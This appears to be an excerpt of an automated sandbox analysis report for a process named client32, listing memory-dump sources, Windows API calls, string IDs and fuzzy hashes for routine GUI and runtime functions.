                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Value__itow_xtoa@16
                                                                                                                                                                                                    • String ID: Error %d setting %s to %s$nsdevcon64.exe
                                                                                                                                                                                                    • API String ID: 293635345-4188669160
                                                                                                                                                                                                    • Opcode ID: 8a4b82b92a86a1b278d0f43154331440ff368002b1b446561c3dd2f6a6996a9c
                                                                                                                                                                                                    • Instruction ID: cea032128ce82b3eaf0532e478ffcf8d701adba4055b92399446afe6a01fb2d0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8a4b82b92a86a1b278d0f43154331440ff368002b1b446561c3dd2f6a6996a9c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0401C075A01219AFD700CAA99C89FEAF7ECDB49708F108199F905E7240DA72AE0487A1
                                                                                                                                                                                                    Function 11153530 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • InvalidateRect.USER32(00000000,00000000,00000000), ref: 11153583
                                                                                                                                                                                                    • UpdateWindow.USER32(?), ref: 111535AE
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: InvalidateRectUpdateWindow
                                                                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                                    • API String ID: 1236202516-2830328467
                                                                                                                                                                                                    • Opcode ID: d7e7c2f0e3a6a5e44f8d0eeae6eb0b297d9b32f503593d364eb6036cc0b7aeaf
                                                                                                                                                                                                    • Instruction ID: b7b16df5a43d60f3fda019c1a35b497fb37b7041778627a412a7a8a3ae26887c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d7e7c2f0e3a6a5e44f8d0eeae6eb0b297d9b32f503593d364eb6036cc0b7aeaf
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6201A4B9B24716ABD2A5D761DC81F8AF364BF8572CF144828F1BB17580EA70F8808795
                                                                                                                                                                                                    Function 11015020 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36windowCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 110A9E1D
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                                                                                                    • String ID: ..\ctl32\liststat.cpp$..\ctl32\listview.cpp$m_hWnd
                                                                                                                                                                                                    • API String ID: 819365019-2727927828
                                                                                                                                                                                                    • Opcode ID: 9b6d80b7455542f82354b29f9862b6f032892670bc7ed0853ece567b39401bfb
                                                                                                                                                                                                    • Instruction ID: e80c3d609587989e24333d1fa603ed55b2b214ac37036ff82e40f0e660cda7c6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9b6d80b7455542f82354b29f9862b6f032892670bc7ed0853ece567b39401bfb
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6BF0F038B80325AFE321D681EC81FC5B2949B05B05F100828F2462B6D0EAA5B4C0C781
                                                                                                                                                                                                    Function 1101D100 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 1101D12F
                                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 1101D136
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorExitItemLastMessageProcessShowWindowwsprintf
                                                                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                                                                                                                                                    • API String ID: 1319256379-1986719024
                                                                                                                                                                                                    • Opcode ID: 5591af17a89e0ca7adab3af439ec82609681faf43d0b1edc9c864f49cd37c925
                                                                                                                                                                                                    • Instruction ID: 4e2be1340c0eb87c864e4721684ff6510800268e2acfe58ec4bc6308307db221
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5591af17a89e0ca7adab3af439ec82609681faf43d0b1edc9c864f49cd37c925
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4AE0867A910329BFC310EE61DC89FDBF7ACDB45754F10C429FA2947200D674E94087A1
                                                                                                                                                                                                    Function 1101D0B0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 1101D0DB
                                                                                                                                                                                                    • EnableWindow.USER32(00000000,?), ref: 1101D0E6
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: EnableErrorExitItemLastMessageProcessWindowwsprintf
                                                                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                                                                                                                                                    • API String ID: 1136984157-1986719024
                                                                                                                                                                                                    • Opcode ID: 9b6c0fd9a44062357b394c58c00652d207fdc6b2e6a946a601fd6034372f8a5b
                                                                                                                                                                                                    • Instruction ID: 2b1270b1ce6598f01739890776adf1a6d9f8641e6ea7dfdd3b9eef3de0244db5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9b6c0fd9a44062357b394c58c00652d207fdc6b2e6a946a601fd6034372f8a5b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 45E02636A00329BFD310EAA1DC84F9BF3ACEB44360F00C429FA6583600CA31E84087A1
                                                                                                                                                                                                    Function 6885EACC Relevance: 6.3, APIs: 4, Instructions: 279COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR100 ref: 6885EAE7
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR100 ref: 6885EAF2
                                                                                                                                                                                                      • Part of subcall function 6885AF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6882B6CF,?,6882C24B,00000003,688074A4,687EA948,0000000C,688074F7,00000001,00000001), ref: 6885AF85
                                                                                                                                                                                                    • _errno.MSVCR100 ref: 6885EB0B
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR100 ref: 6885EB16
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo$_invalid_parameter
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1328987296-0
                                                                                                                                                                                                    • Opcode ID: 1d21298c185a489d5243185a17ccecaf2bcb37292b0f8223cf50577ae131f7b6
                                                                                                                                                                                                    • Instruction ID: a623181bcc452312c5a8756e417c426c492f453860bd0a6d3dde945ffdae2899
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1d21298c185a489d5243185a17ccecaf2bcb37292b0f8223cf50577ae131f7b6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 63A13235A082598BCF21CF69CCD45DE7BB2AF99300F548999FCA5A7304D630DD61CBA2
                                                                                                                                                                                                    Function 687E4A80 Relevance: 6.3, APIs: 4, Instructions: 262COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2959964966-0
                                                                                                                                                                                                    • Opcode ID: 60e4596ce5a9e0a2e9c1fbba2ca985ea7d3551731e044f53e119f8d86f560dda
                                                                                                                                                                                                    • Instruction ID: fc5cab22d1b3dbd509a8d163b99b9359563e5234d2ea79d8173bd62f01bff219
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 60e4596ce5a9e0a2e9c1fbba2ca985ea7d3551731e044f53e119f8d86f560dda
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C9916C34A08A59CBCF318F688ACC2AD7B75AF9A304F544069FC64A7344D7709D11EBB5
                                                                                                                                                                                                    Function 110351A0 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                                                                                      • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
                                                                                                                                                                                                    • std::exception::exception.LIBCMT ref: 11035277
                                                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 1103528C
                                                                                                                                                                                                    • std::exception::exception.LIBCMT ref: 1103529B
                                                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 110352B0
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Exception@8Throwstd::exception::exception$_memsetwsprintf
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 959338265-0
                                                                                                                                                                                                    • Opcode ID: 58b7df8abda35fa66d394f383b262c333d8c95bf7682913761b522499381d223
                                                                                                                                                                                                    • Instruction ID: 4202d9b2a3b9504ee52c3147c78dbba3f188beb93750ea11af99058fe090304e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 58b7df8abda35fa66d394f383b262c333d8c95bf7682913761b522499381d223
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 14411BB5D00619AFCB10CF8AD880AAEFBF8FFA8604F10855FE555A7250E7716604CF91
                                                                                                                                                                                                    Function 11175085 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 111750B9
                                                                                                                                                                                                    • __isleadbyte_l.LIBCMT ref: 111750EC
                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,50036AD0,00BFBBEF,00000000,?,?,?,11175CE8,00000109,00BFBBEF,00000003), ref: 1117511D
                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,00000001,00BFBBEF,00000000,?,?,?,11175CE8,00000109,00BFBBEF,00000003), ref: 1117518B
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3058430110-0
